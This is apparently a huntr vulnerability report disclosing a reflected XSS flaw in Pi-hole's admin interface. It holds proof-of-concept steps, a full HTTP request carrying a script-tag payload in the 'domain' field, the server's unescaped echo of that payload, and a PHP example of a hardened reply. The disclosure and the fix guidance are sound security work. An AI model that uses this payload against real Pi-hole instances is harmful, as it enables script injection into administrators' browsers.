huntr report FA38C61F-4043-4872-BC85-7FE5AE5CC2E8, by wtwver
History: Sep 01, 2021 - 10:54 a.m.

Cross-site Scripting (XSS) - Reflected in pi-hole/adminlte

2021-09-01 10:54:12
wtwver
www.huntr.dev

EPSS: 0.001 (Low), percentile 32.7%

✍️ Description

Reflected XSS in POST /admin/scripts/pi-hole/php/customcname.php

🕵️‍♂️ Proof of Concept

  1. Log in as admin, then go to Local DNS -> CNAME Records -> Add a new CNAME record.
  2. Enter <script>alert(1)</script> in the domain field and anything in the target domain field.
  3. The domain value in the POST body is URL-encoded; use a proxy such as Burp to replace it manually with the decoded value.
Request:

```http
POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Host: pihole.example.com
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pihole.example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pihole.example.com/admin/cname_records.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

action=add&domain=<script>alert(1)</script>&target=a&token=***
```

Response:

```http
HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Access-Control-Allow-Origin: https://pihole.example.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000

{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}
```

💥 Impact

Reflected XSS via the POST parameter “domain”: the rejected value is echoed back unescaped inside the error message, and the response is served with Content-Type: text/html rather than application/json, so a browser that renders it treats the reflected markup as HTML.
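To show why the reply above is exploitable and how the same reply is made inert, here is an added PHP illustration that is not pi-hole/adminlte's own code: a constructed handler that builds the identical JSON error message the weak way and the hardened way (the function names and the $domain value are assumptions made for this example).

```php
<?php
// Added example, not pi-hole/adminlte code. Function names and the sample
// input are assumptions constructed for this illustration.

// Constructed stand-in for the rejected "domain" POST parameter.
$domain = '<script>alert(1)</script>';

// Weak form: the handler never sets a Content-Type, so PHP defaults to
// text/html, and json_encode() leaves '<' and '>' untouched. A browser that
// loads this response directly parses the reflected value as markup.
function replyWeak(string $domain): string {
    return json_encode([
        'success' => false,
        'message' => "Domain '$domain' is not valid",
    ]);
}

// Hardened form: declare the body as JSON so it is never treated as HTML,
// forbid MIME sniffing, and hex-escape HTML metacharacters inside the JSON
// strings so the value stays harmless even if the body is ever rendered.
function replyHardened(string $domain): string {
    header('Content-Type: application/json; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    return json_encode([
        'success' => false,
        'message' => "Domain '$domain' is not valid",
    ], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Build the hardened reply first so its headers are sent before any output.
$hardened = replyHardened($domain);
$weak     = replyWeak($domain);
echo "weak:     $weak\n";
echo "hardened: $hardened\n";
```

The server-side escaping only protects the response when it is loaded directly; if the page's JavaScript inserts the message into the DOM, it must do so as text (textContent or an equivalent), not as HTML.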

